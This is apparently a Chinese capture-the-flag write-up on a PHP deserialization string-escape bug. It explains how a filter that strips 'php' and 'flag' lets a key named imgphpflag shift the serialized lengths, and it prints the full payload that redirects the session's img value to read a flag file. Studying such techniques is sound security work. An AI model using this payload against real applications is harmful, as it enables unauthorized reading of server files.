在PHP反序列化漏洞利用场景中,使用_SESSION[imgphpflag]而非_SESSION[img]的核心技术原理在于规避变量覆盖冲突与构造字符串逃逸漏洞。该设计基于对PHP序列化机制和会话管理逻辑的深度解析。
技术原理深度剖析
1. 变量覆盖冲突规避机制
代码中存在关键赋值语句$_SESSION['img'] = base64_encode('guest_img.png'),该操作在会话初始化阶段执行。若直接通过POST方式提交_SESSION[img]参数,将触发以下冲突:
php
// 代码执行时序分析
$_SESSION['img'] = base64_encode('guest_img.png'); // 初始赋值
extract($_POST); // POST参数提取
// 若存在_POST['_SESSION']['img'],将覆盖前值通过采用非常规键名imgphpflag,有效绕过了该变量覆盖风险。在PHP会话处理中,_SESSION超全局数组的键名具有唯一性,使用差异化键名确保了构造的payload不会被后续赋值操作覆盖。
2. 字符串逃逸漏洞构造原理
关键漏洞点在于filter函数的字符过滤机制:
php
$serialize_info = filter(serialize($_SESSION));
// filter函数将"php"和"flag"替换为空字符串当序列化字符串中的键名包含被过滤词汇时,会产生长度计算偏差:
- 原始序列化字符串:
s:10:"imgphpflag";s:71:";s:3:"woc";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}" - 过滤后变为:
s:10:"img";s:71:";s:3:"woc";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"
此时PHP反序列化器将按照声明的长度10读取键名,实际键名img仅3个字符,导致向后多读取7个字符";s:71:",形成键名截断。这种长度声明与实际内容的错位,正是字符串逃逸漏洞的技术本质。
技术实现对比分析
| 参数方案 | 技术风险 | 可行性 | 实现复杂度 |
|---|---|---|---|
_SESSION[img] |
高(变量覆盖) | 不可行 | 低 |
_SESSION[imgphpflag] |
低(规避冲突) | 可行 | 中 |
攻击载荷构造技术细节
完整攻击链的构造需要严格遵循PHP序列化格式规范:
php
// 原始SESSION结构
array(
'imgphpflag' => ';s:3:"woc";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}'
);
// 序列化后格式
a:1:{s:10:"imgphpflag";s:71:";s:3:"woc";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";}在filter函数处理过程中,键名imgphpflag被过滤为img,但长度声明保持10不变,形成:
php
a:1:{s:10:"img";s:71:";s:3:"woc";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";}
// ↑ 声明长度10 实际内容"img"仅3字符,产生7字符溢出这种精确定位的字符溢出使得后续的";s:3:"img"被正确解析为新的键值对,最终通过file_get_contents(base64_decode($userinfo['img']))成功读取目标文件。
该技术方案充分体现了对PHP反序列化机制深度理解的必要性,在安全测试场景中,类似的字符过滤与长度校验不匹配问题已成为反序列化漏洞的典型攻击向量。